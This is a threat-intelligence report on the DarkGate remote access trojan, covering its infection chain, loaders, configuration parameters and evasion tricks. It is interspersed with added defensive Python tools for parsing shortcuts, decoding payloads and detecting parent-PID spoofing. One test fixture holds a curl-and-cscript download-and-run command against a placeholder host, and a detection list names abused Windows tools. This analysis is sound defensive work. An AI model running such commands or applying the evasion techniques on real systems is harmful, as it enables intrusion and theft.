The Continued Evolution of the DarkGate Malware-as-a-Service
In September 2023, the Trellix Security Operations Center (SOC) detected and stopped an attack against Musaruba, the holding company for Trellix and Skyhigh Security, involving an emerging malware family named DarkGate. First observed in 2018, DarkGate is a Remote Access Trojan (RAT) that lets attackers fully compromise victim systems. It is developed and sold as Malware-as-a-Service (MaaS) by an actor known as RastaFarEye on underground cybercrime forums.
A few months earlier, in June, this actor had released DarkGate version 4, which brought extensive evasion techniques, command and control capabilities, and modules for credential theft, keylogging, screen capturing, and more. These capabilities caught the attention of cybercriminals, who began acquiring the tool and compromising the systems of companies and users around the world. Since then, RastaFarEye has kept modifying DarkGate to bypass security products, reacting to the analyses published by security vendors and researchers.
To better understand the DarkGate threat, the Trellix Advanced Research Center analyzed versions 4.6, 4.10.2, 4.17b, and the latest 5.0.19, mapping the rapid evolution of the malware.
DarkGate is a complete toolkit that provides attackers with extensive capabilities to fully compromise victim systems. It is being developed by the underground user RastaFarEye who offers DarkGate through a subscription-based model costing up to $15,000 per month, justifying the high price tag by claiming the malware has been under continual development since 2017.
One of the first samples was discovered by Fortinet in 2018: a novel malware used to mine cryptocurrencies and deploy ransomware. The malware did not gain widespread popularity until 2021, when Avast discovered an updated version and dubbed it MehCrypter. That version already included many techniques still present in current DarkGate, such as the use of AutoIt to load the final payload and a full RAT module to control remote systems.
In June 2023, RastaFarEye advertised the latest version of DarkGate on the forums mentioned earlier, listing new features such as hVNC, a file manager, Discord and browser stealers, a keylogger and a rootkit module. The developer promised total evasion of any security product, together with a complete command and control panel for convenient control of the bots by buyers.
In August 2023, several security companies and researchers discovered the first campaigns using DarkGate v4. To aid future research, they published their analysis and decryption tools. This caught the attention of RastaFarEye, who published an updated version of the malware to evade them.
RastaFarEye continually pushes minor DarkGate updates to evade antivirus detections, introduce new features, and fix bugs. On September 29th, RastaFarEye announced work on the next major version, DarkGate 5, to be released during October in response to the growing attention from security vendors and researchers. The release was advertised as a big one, with a complete rework of the main code.
Malware Delivery Channels
DarkGate campaigns primarily rely on phishing emails containing links to distribute the initial infection vector, which is either a Visual Basic Script (VBS) or a Windows Installer (MSI) file.
However, in some campaigns, DarkGate has started to use a new way to deploy the initial stage via collaborative applications such as Microsoft Teams, something Trellix's SOC detected targeting Musaruba, which is the holding company for Trellix and Skyhigh Security.
The attacker, who claimed to be a senior executive at Musaruba, sent a Teams message containing a link to a set of employees. The link led to a ZIP file hosted on SharePoint; in an attempt to keep researchers from analyzing the file, only the employees who received the message could access it. Trellix has a variety of security controls deployed that ensure proper defense in depth; in this case it was Trellix IVX for Collaboration Platforms that picked up the DarkGate infection attempts and alerted our SOC.
The ZIP archive contained five Windows shortcut (LNK) files masquerading as PDF documents through the double-extension trick (".pdf.lnk") and a deceptive PDF icon, so that unsuspecting users would open them.
Each shortcut launched a Windows batch command that runs the built-in "curl" utility to retrieve a VBS script from a remote server and then executes it with the Windows Script Host, "CScript.exe".
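The shortcut lure described above is easy to triage at scale once the command line can be pulled out of the .lnk binary. The following is an added example, not Trellix tooling and not code from the DarkGate campaign: a minimal parser for the Shell Link format (MS-SHLLINK) that recovers the StringData fields (relative path, arguments, icon location), plus a triage routine that flags a document-looking double extension and arguments chaining curl and cscript. The sample shortcut is constructed inline with build_lnk(); its target, the example.invalid host and the Acrobat icon path are placeholders, not IoCs from the article.

```python
import struct

HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046} in its on-disk byte order
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData structures appear in exactly this order when their flag is set
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

DOC_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt"}
SUSPICIOUS_TOKENS = ("curl", "cscript", "wscript", "powershell", "mshta", "rundll32", "msiexec")


def _read_string(data, off, unicode):
    count = struct.unpack_from("<H", data, off)[0]
    off += 2
    if unicode:
        return data[off:off + count * 2].decode("utf-16-le"), off + count * 2
    return data[off:off + count].decode("cp1252", errors="replace"), off + count


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk; raises ValueError if it is not one."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize includes the size field itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {name: "" for name, _ in STRING_FIELDS}
    for name, flag in STRING_FIELDS:
        if flags & flag:
            fields[name], off = _read_string(data, off, unicode)
    return fields


def triage_lnk(filename: str, data: bytes) -> list:
    """Human-readable findings for one shortcut; an empty list means nothing stood out."""
    info = parse_lnk(data)
    findings = []
    lower = filename.lower()
    stem = lower[:-4] if lower.endswith(".lnk") else lower
    ext = stem.rsplit(".", 1)[-1] if "." in stem else ""
    if ext in DOC_EXTENSIONS:
        findings.append(f"double extension: shortcut disguised as a .{ext} document")
    args = info["arguments"].lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in args]
    if hits:
        findings.append("arguments invoke " + ", ".join(hits))
    if "http://" in args or "https://" in args:
        findings.append("arguments contain a URL")
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str = "") -> bytes:
    """Assemble a minimal Unicode .lnk; only used to construct the sample below."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    if icon_location:
        flags |= HAS_ICON_LOCATION
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = string_data(relative_path) + string_data(arguments)
    if icon_location:
        body += string_data(icon_location)
    return header + body


# Constructed lure (not an IoC from the article): cmd.exe fetches a VBS with curl and runs it with cscript
SAMPLE_NAME = "Invoice.pdf.lnk"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r"/c curl -s -o %TEMP%\upd.vbs http://example.invalid/upd.vbs && cscript //nologo %TEMP%\upd.vbs",
    r"%ProgramFiles%\Adobe\Acrobat\Acrobat.exe",   # borrowed PDF icon
)

if __name__ == "__main__":
    for finding in triage_lnk(SAMPLE_NAME, SAMPLE_LNK):
        print("[!]", finding)
```

The parser deliberately skips the LinkTargetIDList and LinkInfo blocks instead of decoding them: for a lure like this one the interesting data is the argument string, and the skip is size-driven, so a shortcut with a malformed IDList cannot push the reader off into unrelated bytes.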
The DarkGate version 4 execution chain starts with either a VBS script or an MSI file, which drops and executes the further stages. Whichever initial vector is used, the stages that follow are the same.
The initial VBS dropper contains obfuscated code within approximately 30 lines of script. When executed, this downloads and executes a Windows batch script from the command and control (C&C) server.
The batch script creates a directory with a random name in the root of the C:\ drive and copies the Windows "curl" utility into it under a new name. It then uses the renamed curl to download a legitimate AutoIT executable and a compiled AutoIT script from the C&C and executes them.
An alternative infection vector is an MSI file containing a Windows Cabinet (CAB) archive that stores the AutoIT payload components mentioned above. In later DarkGate versions, the CAB instead holds a weaponized DLL and a signed executable used for the DLL side-loading technique.
AutoIT provides a scripting language to automate Windows GUI interactions and general scripting capabilities. The compiled AutoIT script contains several chunks:
- A large 650KB chunk of data preceding the actual script
- The compiled AutoIT script
- A smaller chunk of data, about 100KB, following the script
The script is delimited by the AutoIT magic number "AU3!EA06".
When decompiled with the open-source project myAut2Exe, the script turns out to contain a hexadecimal-encoded shellcode that executes the next payload stage. The script decodes it and leverages the Windows API function CallWindowProc() to launch it.
The shellcode is responsible for executing a PE file that acts as the DarkGate loader module. It maps the full PE file into memory and calls its entry point, after checking for the "MZ" magic number that marks a valid PE file.
Running solely in memory, the loader reads the first chunk of data from the AutoIT script.
This data holds four elements separated by the "|" character. The second is a key string from which the loader calculates the XOR key; the third is the Base64-encoded, XOR-encrypted binary. The loader decodes the third element and XOR-decrypts it with that key to recover the DarkGate payload.
Later versions (4.17b) instead decode the last stage with a custom-alphabet Base64: the second element is the alphabet and the third is the encoded file.
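The loader data layout just described (a "|"-separated blob in front of the "AU3!EA06" marker, alphabet in the second element, encoded payload in the third) can be reproduced in a few lines of analyst tooling. The following is an added example, not Trellix tooling and not DarkGate code: it carves the blob, decodes the third element (the payload) and the fourth element (the restart shellcode discussed in the Kaspersky bypass section) with a Base64 decoder that accepts an arbitrary 64-symbol alphabet, the same custom-alphabet Base64 the article later describes for DarkGate's string encoding. It implements the 4.17b layout only; the 4.6 key derivation and XOR step are not detailed in the article and are not implemented here. The sample file, alphabet and payload bytes are constructed inline and are not real DarkGate artifacts.

```python
import base64

AU3_MAGIC = b"AU3!EA06"
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def custom_b64decode(encoded: str, alphabet: str) -> bytes:
    """Decode Base64 text written with a custom 64-symbol alphabet."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must be 64 distinct symbols")
    if "=" in alphabet:
        raise ValueError("'=' is reserved for padding in this decoder")
    normalized = encoded.translate(str.maketrans(alphabet, STD_ALPHABET))
    normalized += "=" * (-len(normalized) % 4)      # tolerate stripped padding
    return base64.b64decode(normalized, validate=True)


def custom_b64encode(raw: bytes, alphabet: str) -> str:
    """Inverse of custom_b64decode; used only to build the constructed sample."""
    text = base64.b64encode(raw).decode("ascii").rstrip("=")
    return text.translate(str.maketrans(STD_ALPHABET, alphabet))


def carve_loader_data(au3_file: bytes, codec: str = "latin-1") -> list:
    """Return the four "|"-separated elements stored in front of the AU3 marker."""
    idx = au3_file.find(AU3_MAGIC)
    if idx < 0:
        raise ValueError("no AU3!EA06 marker: not a compiled AutoIT script")
    elements = au3_file[:idx].split(b"|")
    if len(elements) != 4:
        raise ValueError(f"expected 4 elements before the script, found {len(elements)}")
    # 4.17b alphabets may be non-ASCII: decode alphabet and data with the same codec
    return [e.decode(codec) for e in elements]


def extract_payloads(au3_file: bytes) -> dict:
    """Decode the payload (element 3) and restart shellcode (element 4)."""
    _, alphabet, payload_b64, restart_b64 = carve_loader_data(au3_file)
    payload = custom_b64decode(payload_b64, alphabet)
    restart = custom_b64decode(restart_b64, alphabet)
    if not payload.startswith(b"MZ"):
        raise ValueError("decoded payload lacks the MZ header; wrong alphabet or layout")
    return {"payload": payload, "restart_shellcode": restart}


# Constructed sample (not a real DarkGate artifact)
SAMPLE_ALPHABET = STD_ALPHABET[::-1]                 # any permutation of 64 symbols works
SAMPLE_PAYLOAD = b"MZ" + bytes(range(256))           # stands in for the DarkGate PE
SAMPLE_RESTART = bytes([0x55, 0x8B, 0xEC]) * 8       # stands in for the restart shellcode
SAMPLE_AU3 = b"|".join([
    b"header",
    SAMPLE_ALPHABET.encode("latin-1"),
    custom_b64encode(SAMPLE_PAYLOAD, SAMPLE_ALPHABET).encode("latin-1"),
    custom_b64encode(SAMPLE_RESTART, SAMPLE_ALPHABET).encode("latin-1"),
]) + AU3_MAGIC + b"\x00" * 64                        # the compiled script would follow here

if __name__ == "__main__":
    found = extract_payloads(SAMPLE_AU3)
    print("payload bytes:", len(found["payload"]),
          "restart shellcode bytes:", len(found["restart_shellcode"]))
```

The decoder maps the custom alphabet onto the standard one and reuses the standard library, so an alphabet that contains "|" or "=" would break the split or the padding logic; both are rejected up front rather than producing silently wrong bytes.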
Version 5 Enhancements
DarkGate version 5 introduces a new execution chain using DLL side-loading and enhanced shellcodes and loaders. However, it retains some version 4 features including VBS/MSI initial stages and AutoIT scripts.
The first stage of DarkGate version 5 is similar to version 4, it relies on a VBS script to download further stages or a MSI file to drop them. The execution flow differs between the VBS and MSI distribution vectors:
- The VBS version directly drops the AutoIT payload instead of a DLL/executable combination.
- The MSI version utilizes DLL side-loading, where a signed executable loads a malicious DLL.
We discovered a new DarkGate v5 infection vector using DLL side-loading, where a legitimate application loads a malicious DLL: the KeyScrambler application loads a trojanized DarkGate version of its "KeyScramblerE.dll" library.
The DLL exposes 21 dummy exports to appear legitimate. The real malicious code runs from the DLL entry point, which contains an XOR decryption routine that extracts and executes a shellcode payload.
The updated shellcode uses the curl utility to retrieve the next-stage AutoIT executable, similar to version 4.
The dropped AutoIT binary looks similar to the AutoIT script from version 4. However, in this case, the loader is not a Base64 encoded PE file, but a hardcoded shellcode instead.
DarkGate v5 introduces a new shellcode loader that downloads, decrypts, and executes the final payload. Unlike previous versions, the XOR decryption key is taken from the first 8 bytes of the downloaded data rather than being hardcoded. This stealthier loader shows the incremental improvements in DarkGate's multistage infection chain: the developer keeps modifying tactics to increase stealth, hinder analysis, and evade security defenses.
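Both XOR steps described above (the DLL entry point that unpacks its shellcode, and the v5 loader that takes its key from the first 8 bytes of the download) come down to the same recovery routine. The following is an added example, not the loader's own code: decrypt_v5_blob() strips the in-band key, XOR-decrypts the remainder and applies the sanity checks an analyst wants (minimum length, degenerate all-zero key, MZ header on the result), and find_inband_key_length() scans other key lengths for the day a variant changes the layout. The key-before-data layout with a repeating-key XOR is an assumption about the exact byte arrangement; the fake PE image and the key used to build the blob are constructed for the demo.

```python
KEY_LEN = 8   # v5 layout per the article: key is the first 8 bytes of the downloaded data


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (assumed to be the loader's mode; it is its own inverse)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_v5_blob(blob: bytes, key_len: int = KEY_LEN) -> bytes:
    """Recover the payload from a blob that carries its XOR key in-band."""
    if len(blob) <= key_len:
        raise ValueError("blob too short to hold the key and a payload")
    key, body = blob[:key_len], blob[key_len:]
    if key == bytes(key_len):
        raise ValueError("all-zero key: XOR would be a no-op, layout is probably wrong")
    plain = xor_repeating(body, key)
    if not plain.startswith(b"MZ"):
        raise ValueError("decrypted data is not a PE; key position or length differs")
    return plain


def find_inband_key_length(blob: bytes, candidates=range(4, 33)) -> int:
    """Try other key lengths when the 8-byte assumption stops holding for a new build."""
    for n in candidates:
        # Only the first two ciphertext bytes need decrypting to test for "MZ"
        if len(blob) > n + 1 and xor_repeating(blob[n:n + 2], blob[:n]) == b"MZ":
            return n
    raise ValueError("no candidate key length yields an MZ header")


def encrypt_v5_blob(payload: bytes, key: bytes) -> bytes:
    """Build a blob in the assumed v5 layout; used only for the constructed sample."""
    if len(key) != KEY_LEN:
        raise ValueError("key must be 8 bytes")
    return key + xor_repeating(payload, key)


# Constructed sample: a fake PE image and an arbitrary 8-byte key (not from a real download)
SAMPLE_PAYLOAD = b"MZ" + bytes(range(200)) + b"PE\x00\x00"
SAMPLE_KEY = bytes.fromhex("d34db33f0badc0de")
SAMPLE_BLOB = encrypt_v5_blob(SAMPLE_PAYLOAD, SAMPLE_KEY)

if __name__ == "__main__":
    recovered = decrypt_v5_blob(SAMPLE_BLOB)
    print("recovered", len(recovered), "bytes; key length detected as",
          find_inband_key_length(SAMPLE_BLOB))
```

The MZ check is the only thing that tells a correct key position from a wrong one, because XOR with any key produces plausible-looking bytes; that is also why the key-length scan tests just the first two plaintext bytes before committing to a full decrypt.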
DarkGate malware payload
The DarkGate payload is a modular sample that implements many functionalities to fully control a remote system. Since the release of version 4 in June 2023, DarkGate has received several updates and fixes aimed at defeating the tools the security community has developed, something that matters to customers who pay a generous amount of money for it.
In the following sections we describe how DarkGate has changed in recent months. To do so, we analyzed several versions of DarkGate, including one of the latest samples, discovered in October 2023.
DarkGate relies on a number of readable strings to operate. These strings are encoded in all versions except v5.0.19, which encodes only a few, such as the C&C URL. The encoding follows the same approach throughout: Base64 with custom alphabets, one for the configuration and another for general-purpose strings.
DarkGate 4.6 used different ASCII alphabets; the alphabets of the analyzed sample were the following:
Because every encoded string was therefore plain ASCII, the community's decoding tools assumed ASCII input. To break those tools, the DarkGate developer switched to a non-ASCII alphabet for general-purpose strings, while keeping the same alphabet for the configuration string but Zlib-compressing it before encoding. The result was encoded strings that were no longer ASCII, forcing the security tools to adapt. The alphabets of the 4.17b sample were the following:
Version 5.0.19 uses a single alphabet, the same one used for the "configuration" in previous versions, and, as mentioned earlier, only in a few places.
The configuration string holds the parameters DarkGate uses to enable or disable its features. The configuration originally had 19 entries, but the latest samples, versions 4.17b and 5.0.19, show at least 27 parameters with identifiers (ID) ranging from 0 to 29; IDs 20 and 21 are absent in some samples. The following table compares the configuration of all the samples one to one:
These parameters, listed by ID, can be translated as follows (the names given after the ID are the ones recovered from the samples):
- ID 0: port number used to communicate with the C&C server.
- ID 1, startup: the binary copies itself to the Startup folder "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup" and creates a value under "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" as a persistence mechanism.
- ID 2, rootkit: the binary is able to inject code or binaries into other processes using process hollowing and portable executable injection to evade security products.
- ID 3, antivm: checks whether the system runs under VirtualBox, VMware or Hyper-V by inspecting the system's display information.
- ID 4: numeric value, the minimum amount of free disk space required to run DarkGate.
- ID 5, antidisk: checks the free disk space available on the system. If the minimum defined in ID 4 is not met, DarkGate will not execute.
- ID 6, antienv: checks parameters such as display and processor information to determine whether the system is a virtual machine.
- ID 7: numeric value, the minimum amount of RAM required to run DarkGate.
- ID 8, antiram: checks the RAM size of the system. If the minimum defined in ID 7 is not met, DarkGate will not execute.
- ID 9: checks whether the processor of the current system is an Intel Xeon.
- ID 10, internalmutex: string used as a seed, together with the HWID identifier and the input text, to derive a unique string that serves as the internal mutex name.
- ID 11: indicates that the binary was distributed as a raw stub, without packing.
- ID 12, DarkGate InternalCrypter DLL: indicates that the binary was distributed packed/crypted inside a DLL.
- ID 13, DarkGate InternalCrypter AU3: indicates that the binary was distributed packed/crypted inside an Autoit3 file.
- ID 14: unknown. In the samples we analyzed it was treated as a Boolean rather than an integer and, if enabled, the system's RAM size was checked during the cryptomining checks.
- ID 15: key used when the binary is crypted inside a DLL.
- ID 16: numeric value, the delay the sample uses between pings to the C&C server.
- ID 17: checks whether the process is being debugged via the "BeingDebugged" flag in the PEB structure. This feature was missing from the latest samples, even when enabled in the configuration.
- ID 18: unknown. The analyzed samples lacked this feature; the parameter was enabled in the configuration, but the sample itself disabled it at runtime.
- ID 19: creates persistence by copying the file to the %LOCALAPPDATA% path and storing that path as a value under "SOFTWARE\Microsoft\Windows\CurrentVersion\Run".
- ID 20: enables the "binder" feature, which listens for an encoded binary that is either written to the file system or executed through process hollowing, PE injection or the "ShellExecuteExA" function. This parameter is missing in some samples.
- ID 21: string appended to the end of the system-information string gathered by DarkGate. This parameter is missing in some samples.
- ID 22: port number used by the cryptomining module to communicate with the C&C server.
- ID 23, username: the username the sample will use.
- ID 24: sends the installation path of DarkGate to the C&C server after attempting to elevate privileges.
- ID 25: numeric value, the total time in minutes the sample listens for specific commands on a separate thread.
- ID 26: unknown. Although present in the configuration, it was not implemented in the samples.
- ID 27: if enabled, writes/reads hashed system information to/from a file stored in APPDATA.
- ID 28: enables the Kaspersky security product bypass using process injection.
- ID 29: unknown. Although present in the configuration, it was not implemented in the samples.
Many options have been included in the configuration structure since the first samples from 2023, some of them being not developed or without a clear purpose, suggesting that these features are in an early development state.
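The parameters above are mostly gates, and the question a sandbox operator actually asks is whether a given configuration would let the sample run on a given machine. The following is an added example, not DarkGate or Trellix code: parse_config() names a decoded configuration by the IDs listed above, and environment_blockers() replays the anti-analysis gates of IDs 3 to 9 against a host profile. The article does not give the delimiter or the Boolean encoding of the decoded configuration string, so the values are taken as an already-split list and "1"/"Yes"/"true" are assumed to mean enabled; the exact processor checks behind antienv, the decision to refuse Xeon processors, GB units for IDs 4 and 7 and the host profile fields are assumptions, and the sample values are constructed.

```python
CONFIG_NAMES = {
    0: "c2_port", 1: "startup", 2: "rootkit", 3: "antivm", 4: "min_disk",
    5: "antidisk", 6: "antienv", 7: "min_ram", 8: "antiram", 9: "check_xeon",
    10: "internalmutex", 11: "raw_stub", 12: "crypter_dll", 13: "crypter_au3",
    14: "unknown_14", 15: "dll_crypter_key", 16: "c2_ping_delay", 17: "antidebug",
    18: "unknown_18", 19: "localappdata_persistence", 20: "binder", 21: "sysinfo_suffix",
    22: "miner_port", 23: "username", 24: "report_install_path", 25: "listen_minutes",
    26: "unknown_26", 27: "hashed_sysinfo_file", 28: "kaspersky_bypass", 29: "unknown_29",
}

# Hypervisor names the article lists for the antivm display check
VM_MARKERS = ("virtualbox", "vmware", "hyper-v")


def _flag(value: str) -> bool:
    # Boolean encoding is not documented in the article; "1"/"Yes"/"true" assumed
    return value.strip().lower() in ("1", "yes", "true")


def parse_config(values: list) -> dict:
    """Map a decoded, already-split configuration onto the ID names above."""
    if len(values) != len(CONFIG_NAMES):
        raise ValueError(f"expected {len(CONFIG_NAMES)} values, got {len(values)}")
    return {CONFIG_NAMES[i]: v for i, v in enumerate(values)}


def environment_blockers(cfg: dict, host: dict) -> list:
    """Reasons the enabled gates would stop execution on `host`; empty means it would run."""
    reasons = []
    if _flag(cfg["antidisk"]) and host["disk_gb"] < int(cfg["min_disk"]):
        reasons.append(f"antidisk: {host['disk_gb']} GB free < ID 4 minimum {cfg['min_disk']} GB")
    if _flag(cfg["antiram"]) and host["ram_gb"] < int(cfg["min_ram"]):
        reasons.append(f"antiram: {host['ram_gb']} GB RAM < ID 7 minimum {cfg['min_ram']} GB")
    if _flag(cfg["antivm"]) and any(m in host["display"].lower() for m in VM_MARKERS):
        reasons.append("antivm: display adapter names a hypervisor")
    # antienv checks "display and processor information"; CPU string and core count assumed
    if _flag(cfg["antienv"]) and (any(m in host["cpu"].lower() for m in VM_MARKERS)
                                  or host.get("cpu_cores", 2) < 2):
        reasons.append("antienv: processor information looks virtual")
    if _flag(cfg["check_xeon"]) and "xeon" in host["cpu"].lower():
        reasons.append("check_xeon: Xeon processor suggests server or sandbox hardware")
    return reasons


# Constructed configuration: minimums match the 4 GB RAM / 100 GB disk preference seen in the telemetry
SAMPLE_VALUES = ["8080", "Yes", "Yes", "Yes", "100", "Yes", "Yes", "4", "Yes", "Yes",
                 "seed", "No", "No", "Yes", "No", "", "4", "Yes", "No", "No",
                 "No", "", "8081", "user", "Yes", "60", "", "No", "Yes", "No"]
SMALL_SANDBOX = {"ram_gb": 2, "disk_gb": 40, "display": "VMware SVGA 3D",
                 "cpu": "Intel Xeon E5-2680 v4", "cpu_cores": 1}
TUNED_SANDBOX = {"ram_gb": 8, "disk_gb": 120, "display": "NVIDIA GeForce GTX 1060",
                 "cpu": "Intel Core i7-8700", "cpu_cores": 4}

if __name__ == "__main__":
    cfg = parse_config(SAMPLE_VALUES)
    for name, host in (("small sandbox", SMALL_SANDBOX), ("tuned sandbox", TUNED_SANDBOX)):
        print(name, "->", environment_blockers(cfg, host) or "would run")
```

Feeding a decoded configuration through this check tells you which of a sandbox's properties to change before re-detonating, rather than guessing from a silent exit.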
DarkGate implements a wide variety of commands, many of them being commonly seen in RAT samples. Since many functionalities are commonly seen in malware, this analysis focuses on novel capabilities related to evasion, anti-analysis, and privilege escalation.
To escalate privileges, DarkGate will perform two different approaches depending on the used crypter:
- If the binary does not use any crypter (ID 11, the raw stub option), it simply tries to elevate privileges to SYSTEM with the Sysinternals tool PsExec.
- If either of the two available crypters is used, DarkGate tries to elevate privileges through process hollowing: it requests from the C&C a binary to be injected into notepad.exe, which we suspect performs the elevation and relaunches the application. We were not able to retrieve that binary.
DarkGate claims to contain a rootkit module that makes it completely hidden from tools such as Task Manager or Process Explorer, which will only be executed if the configuration ID 2 is enabled. Despite rootkit claims, DarkGate does not implement kernel hooking. It relies on process injection and parent PID spoofing to hide its process from monitoring tools.
This approach may be intended to prevent antivirus software from detecting the sample, since many products look for hooks implanted in memory. It is worth noting, however, that process injection techniques are widely detected too. The threat actor seems aware of this: some techniques are only executed when a specific antivirus is not installed.
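Parent PID spoofing, one of the two techniques behind the "rootkit" option, leaves a process tree in which the nominal parent (say explorer.exe) is not the process that actually called CreateProcess. Kernel process-start telemetry that records both the creator (the process context the event was raised in) and the nominal parent makes this visible; a Sysmon Event ID 1 record alone only shows the nominal parent. The following is an added example, not a Trellix detection: a check over normalized process-start records that flags creator/parent mismatches and allowlists the legitimate case of elevation through an svchost-hosted service. The records are constructed and the field names (pid, ppid, creator_pid, image) are an assumed normalized schema rather than any product's native log format; the Autoit3.exe/notepad.exe pairing mirrors the injection target described earlier.

```python
# Creators that legitimately start children on another process's behalf (UAC elevation via
# the AppInfo service, for example, re-parents the child to the requester). Extend per environment.
ALLOWED_CREATORS = {"svchost.exe"}


def find_ppid_spoofing(events, images, allowed_creators=ALLOWED_CREATORS):
    """Return children whose actual creator differs from the parent they claim."""
    findings = []
    for ev in events:
        creator = ev.get("creator_pid")
        if creator is None or creator == ev["ppid"]:
            continue                     # no creator context, or a normal parent/child pair
        creator_image = images.get(creator, f"pid {creator}")
        if creator_image.lower() in allowed_creators:
            continue                     # known benign re-parenting
        findings.append({
            "pid": ev["pid"],
            "image": ev["image"],
            "claimed_parent": images.get(ev["ppid"], f"pid {ev['ppid']}"),
            "actual_creator": creator_image,
        })
    return findings


def describe(finding: dict) -> str:
    return (f"pid {finding['pid']} ({finding['image']}) claims parent "
            f"{finding['claimed_parent']} but was created by {finding['actual_creator']}")


# Constructed telemetry: pid -> image for the processes referenced as parents/creators
IMAGES = {1200: "explorer.exe", 3100: "Autoit3.exe", 4800: "svchost.exe"}
EVENTS = [
    {"pid": 4100, "ppid": 1200, "creator_pid": 1200, "image": "notepad.exe"},  # user opened Notepad
    {"pid": 5200, "ppid": 1200, "creator_pid": 3100, "image": "notepad.exe"},  # spoofed parent
    {"pid": 5300, "ppid": 4800, "image": "wuauclt.exe"},                        # no creator field
    {"pid": 5400, "ppid": 1200, "creator_pid": 4800, "image": "mmc.exe"},      # elevated via service
]

if __name__ == "__main__":
    for f in find_ppid_spoofing(EVENTS, IMAGES):
        print("[!]", describe(f))
```

Records without a creator field are skipped rather than flagged: the mismatch is only meaningful when the telemetry actually captured who called CreateProcess, so the check degrades to silence, not noise, on Sysmon-only data.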
Recent DarkGate versions since v4.13 implement functionality to bypass Kaspersky endpoint and antivirus products.
DarkGate first checks if the Autoit3 crypter (ID 13) and persistence settings (ID 1) are enabled. It then decodes a shellcode from the AutoIT payload that relaunches DarkGate in a new process, evading EDR detection.
The shellcode is decoded from the Autoit3 file with the same Base64 table used for the payload (the second element of the split chunk data), taking the fourth element as the encoded data.
The shellcode works like the one seen in the initial stages: it executes a PE file stored in variables, and that PE file decodes and executes the DarkGate payload stored in the Autoit3 file in the same way as the initial stages. The net effect is a restart of DarkGate in a different process.
Bypassing Kaspersky AV
DarkGate uses the Autoit3.exe process that launched the DarkGate payload to inject itself, which will result in the alleged bypass of Kaspersky security products.
Additional evasion methods such as Parent PID (PPID) spoofing and process hollowing aim to thwart other antivirus products such as Avast, AVG or Bitdefender. The developer boasted of AV evasion, yet detections remain viable.
Commonwealth of Independent States (CIS) countries check
To avoid running in Russian-speaking countries, the binary uses the common approach of checking the system default locale identifier (LCID) through the Windows API function GetSystemDefaultLCID.
However, some of the announced evasion capabilities contradict the observed behavior: version 4.10 blocked CIS countries, but the newer versions (4.13, 4.17b and 5.0.19) lack this check despite the claims.
NetPass RDP password recovery
Version 5 of DarkGate reworked the RDP password theft feature, embedding the NirSoft Network Password Recovery (NetPass) tool.
Tracking DarkGate in the Wild
Analyzing the collected samples, we observed interesting statistics about their C&C servers. The chart breaks down the distribution of malware samples per threat actor. The top five threat actors, ranked by the C2 servers in our dataset, are distinct, with each handling a significant number of samples. Notably, the C2 server 126.96.36.199 at the top of the list is associated with the most DarkGate variants, marking it as a major hub for DarkGate.
Threat actors are cautious and avoid potential traps such as malware sandboxes and low-resource targets. Our statistics on evasion settings show a clear preference for victims with more than 4GB of RAM and a 100GB hard drive. One outlier stands out: the notably active threat actor operating from the IP address 188.8.131.52 requires a broad range of minimum drive sizes, from 30GB to 99GB, across multiple variants of the same group.
Visualizing our analysis as a global heatmap, we uncovered patterns in detection hits across the globe. The United States led the chart with significant hits, underscoring its prominence in the dataset and a heightened level of activity in the region. In Europe, Germany and Italy account for most of the continent's hits. Regions in Asia such as Malaysia and Singapore, as well as South America and Africa, also appear, suggesting a global spread of the DarkGate stealer malware.
In our analysis, RastaFarEye's DarkGate has shown itself to be more than just another piece of malware. It integrates a wide variety of functionalities to steal information from users' systems and evade antivirus software, and its author has built the execution chains from scratch along with a C&C panel to conduct operations. Moreover, the threat actor actively monitors threat reports and makes quick changes to evade detections. Its adaptability, the speed with which it iterates, and the depth of its evasion methods attest to the sophistication of modern malware threats.
However, we found contradictions between what RastaFarEye claimed on the forums and what is implemented in DarkGate version 5, such as the CIS-country exclusion missing from the latest samples or the promised rework of the entire code. The latter could be explained by the variant still being in development, which would also account for missing features such as the string encoding.
